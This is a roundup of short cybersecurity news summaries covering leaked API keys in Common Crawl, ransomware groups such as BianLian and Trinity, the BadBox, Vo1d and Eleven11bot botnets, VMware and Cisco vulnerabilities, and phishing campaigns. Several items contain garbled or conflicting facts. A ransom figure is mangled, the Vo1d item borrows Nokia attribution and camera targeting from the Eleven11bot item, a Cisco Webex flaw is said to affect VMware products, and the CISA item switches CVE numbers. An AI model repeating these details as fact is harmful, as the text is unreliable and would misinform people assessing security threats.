12,000 API Keys and Passwords Found in AI Training Datasets
Nearly 12,000 API keys and passwords were discovered in the Common Crawl dataset used for training AI models. Researchers from Truffle Security analyzed 400 terabytes of data and identified 11,908 authenticated secrets, predominantly hardcoded in front-end code. The exposed credentials include keys for services like AWS and MailChimp, posing significant risks for enterprises. The findings underscore the need for improved coding practices to prevent sensitive information from being included in publicly accessible datasets. Read more
Open-Source Tool Rayhunter Helps Users Detect Stingray Attacks
The EFF launched Rayhunter, an open-source tool to detect Stingray attacks, which use cell-site simulators to intercept sensitive data. Rayhunter captures control traffic between a mobile hotspot and cell tower, analyzing it for suspicious events without monitoring user activity. It alerts users via visual indicators and allows data logging for further analysis. Designed to run on affordable mobile hotspots, Rayhunter aims to enhance user awareness of potential threats from unauthorized access to mobile communications. Read more
Fake BianLian Ransom Notes Mailed to US CEOs in Postal Mail Scam
Scammers impersonating the BianLian group are mailing fake ransom notes to US CEOs, threatening data leaks unless Bitcoin payments are made. The letters claim to originate from the BianLian Group and demand payment within 10 days, with the ransom amounts ranging from 250,000to250,000 to 250,000to500,000. To enhance credibility, some notes included actual compromised passwords. Experts warn organizations to educate executives about such scams to prevent panic and misallocation of resources. Read more
BadBox Malware Disrupted on 500K Infected Android Devices
BadBox malware, targeting low-cost Android devices, has disrupted over 500,000 infected units globally. Cybersecurity experts removed 24 malicious applications from Google Play and sinkholed the botnet’s communication channels. This malware primarily exploits vulnerabilities in TV streaming boxes and smartphones, turning them into proxies for fraudulent activities. The operation revealed significant infections in regions like Brazil and the US, emphasizing the risks associated with insecure devices and the need for robust cybersecurity measures. Read more
Silk Typhoon Hackers Now Target IT Supply Chains to Breach Networks
Silk Typhoon hackers have shifted tactics to exploit IT supply chains, targeting various industries, including government and healthcare. They compromise remote management tools to infiltrate networks, leveraging unpatched applications and stolen credentials. Microsoft reported that the group has been actively scanning GitHub repositories for leaked authentication keys and utilizing malware like PlugX for persistent access. This evolution in tactics highlights the increasing sophistication of cyberattacks aimed at critical infrastructure. Read more
YouTube Warns of AI-Generated Phishing Attacks Targeting Creators
YouTube issued a warning about phishing campaigns utilizing AI-generated videos of CEO Neal Mohan. Attackers distribute fake private videos claiming policy changes to steal creators’ credentials. The fraudulent video directs users to a malicious site disguised as a YouTube login page, threatening account restrictions if they fail to comply. YouTube advises users to avoid suspicious links and emphasizes that legitimate communications will never be sent through private videos. Read more
US Charges Chinese Hackers Targeting Critical Infrastructure Breaches
The US Justice Department indicted Chinese state security officers and hackers from APT27 and i-Soon for cyberattacks targeting critical infrastructure since 2011. The indictment details how these actors conducted intrusions directed by China’s Ministry of State Security, selling stolen data to government bureaus. The DOJ has offered rewards for information on ten individuals involved in this extensive hacking campaign, which exploited vulnerabilities and installed persistent malware, underscoring the ongoing threat to national security. Read more
Hunters International Claims Ransomware Attack on Tata Technologies: 1.4TB Data Breached
Hunters International claimed responsibility for a ransomware attack on Tata Technologies, stealing approximately 1.4 TB of data. The breach, reported in January 2025, involved 730,000 files but had minimal operational impact. Hunters have threatened to release the stolen data if their ransom demands are not met. The attack underscores ongoing risks from ransomware groups, particularly those with a history of high-profile breaches in various sectors, including government and defense. Read more
Black Basta and Cactus Ransomware: Shared Tactics and BackConnect Malware Connection
The Black Basta and Cactus ransomware groups share tactics and utilize BackConnect malware for network infiltration. Both employ social engineering techniques to overwhelm targets, often impersonating IT help desk employees. The malware acts as a proxy, allowing cybercriminals to mask their activities and escalate attacks undetected. This connection underscores the need for organizations to remain vigilant against evolving threats as these groups continue to adapt their methods for greater effectiveness. Read more
Cisco Warns of BroadWorks Flaw Exposing Credentials
Cisco has issued a warning about a vulnerability in Webex for BroadWorks that could allow unauthenticated attackers to access sensitive credentials remotely. This flaw affects various VMware ESX products and may enable attackers to access data if insecure transport is configured for SIP communication. Users are advised to restart their Cisco Webex app and configure secure transport for SIP communication to mitigate risks. Read more
Broadcom Fixes Three VMware Zero-Days Exploited in Attacks
Broadcom has addressed three critical VMware zero-day vulnerabilities that have been actively exploited, affecting products like ESXi and vSphere. Identified as CVE-2025-22224, CVE-2025-22225, and CVE-2025-22226, these flaws allow attackers with privileged access to escape the virtual machine sandbox. Organizations must apply patches immediately, as exploitation of these vulnerabilities poses significant risks, especially given their targeting by various hacking groups. Read more
Major Data Breach at Lost & Found Tracking Site Exposes Over 800,000 Records
A data breach at the German travel tracking firm Lost & Found has exposed over 800,000 records, including sensitive information like passport scans and driver’s licenses. Discovered by security researcher Jeremiah Fowler, the publicly available dataset contained 820,750 records totaling 122GB. The exposure raises significant identity theft concerns as criminals could misuse the compromised personally identifiable information. Investigations are ongoing to determine the breach’s extent and responsible parties. Read more
Polish Space Agency Suffers Cyberattack, Takes Systems Offline
The Polish Space Agency (POLSA) disconnected its systems following a cyberattack that compromised its email systems. The agency reported the incident to authorities and initiated an investigation while collaborating with national CSIRT teams. Although the specific nature of the attack remains undisclosed, the disruption emphasizes the critical role of email in operations and the potential risks to national infrastructure. Ongoing efforts are focused on identifying the perpetrators and restoring system functionality. Read more
New Polyglot Malware Targets Aviation and Satellite Communication Firms
A new polyglot malware named Sosano has emerged, targeting aviation and satellite communication firms in the UAE. Discovered by Proofpoint, the malware enables remote command execution and establishes persistence on infected devices. It spreads through spear-phishing emails that direct victims to malicious downloads, utilizing a sophisticated multi-file format approach to evade detection. Organizations are urged to enhance their security measures to combat this evolving threat effectively. Read more
Eleven11bot: New Botnet Infects 86,000 Devices for DDoS Attacks
The Eleven11bot botnet has infected over 86,000 IoT devices, primarily targeting security cameras and NVRs for DDoS attacks. Discovered by Nokia, the botnet exploits weak admin credentials and scans for exposed ports. Attacks have reached millions of packets per second, affecting devices mainly in the US, UK, and other countries. Organizations are advised to block associated IP addresses and enhance their IoT security practices to mitigate this threat. Read more
Outsourcing Cybersecurity Could Save Your Company Millions
Outsourcing cybersecurity management presents numerous benefits, such as access to expertise, cost efficiency, and better threat prediction. External providers offer 24/7 support and continuous monitoring, allowing organizations to focus on core business functions. However, companies must weigh potential risks, including data security and control over security practices. A thorough evaluation of internal capabilities and potential providers is essential for making informed decisions regarding cybersecurity management. Read more
BianLian Ransomware: Shadow Data Extortion Group
The BianLian ransomware group has shifted from double-extortion to a data exfiltration model, targeting critical infrastructure and private sector organizations. Likely based in Russia, the group exploits RDP and phishing for access, threatening to publicly release stolen data unless ransoms are paid. Understanding BianLian’s methods is crucial for organizations to mitigate risks associated with this sophisticated threat actor. Read more
OnlyFans Cyberattacks: Fake CAPTCHAs and Malware Distribution Threaten Users
OnlyFans users are facing increasing phishing attacks utilizing fake Cloudflare CAPTCHAs and malware-laden links. Cybercriminals trick users into executing malicious scripts, leading to keyloggers and ransomware installation. This sophisticated approach exploits user trust and aims to harvest sensitive information. Organizations must implement robust email scanning and user education to combat these threats effectively. Read more
Vo1d Botnet Surpasses 1.59 Million Infected Android TVs Across 226 Countries
The Vo1d botnet has infected over 1.59 million Android TVs globally, affecting 226 countries. Discovered by Nokia, this botnet primarily targets security cameras and NVRs, with significant infection rates noted in India. The botnet operates using approximately 800,000 active IP addresses and employs RSA encryption to evade detection. Attackers exploit weak admin credentials and scan for exposed ports to spread the malware. Organizations are urged to block associated IP addresses to mitigate the threat. Read more
ClickFix Attack Deploys Havoc C2 via Microsoft SharePoint
A new ClickFix attack exploits Microsoft SharePoint to deploy the Havoc framework, tricking users into executing malicious PowerShell commands. The phishing campaign involves emails with an HTML attachment that displays fake error messages, prompting users to click for a solution. This action copies a harmful PowerShell command to the clipboard, leading to script execution from the attacker’s SharePoint server. The Havoc framework allows attackers to maintain control over compromised devices, facilitating further malicious activities. Read more
CISA Tags Windows and Cisco Vulnerabilities as Actively Exploited
CISA has issued a critical alert regarding vulnerabilities in Cisco and Windows systems, identified as actively exploited. The vulnerabilities include CVE-2023-20118, allowing arbitrary command execution on Cisco VPN routers, and CVE-2018-8639, a Win32k flaw affecting Windows systems. Federal agencies are mandated to secure their networks by March 23, 2025. Cisco confirmed publicly available proof-of-concept exploit code for CVE-2023-20025, emphasizing the urgency of patching these vulnerabilities to prevent potential attacks. Read more
Trinity Ransomware: The Enigma of the .trinitylock
Trinity ransomware, first observed in May 2024, employs a double extortion model, exfiltrating data before encryption. Utilizing the ChaCha20 encryption algorithm, it appends the “.trinitylock” extension to encrypted files. The group has targeted healthcare entities in the US and UK, claiming access to sensitive data. Their operations include a victim support site and a data leak site, increasing pressure on victims to pay ransoms. The ransom notes provide communication details and a 24-hour deadline for responses. Read more
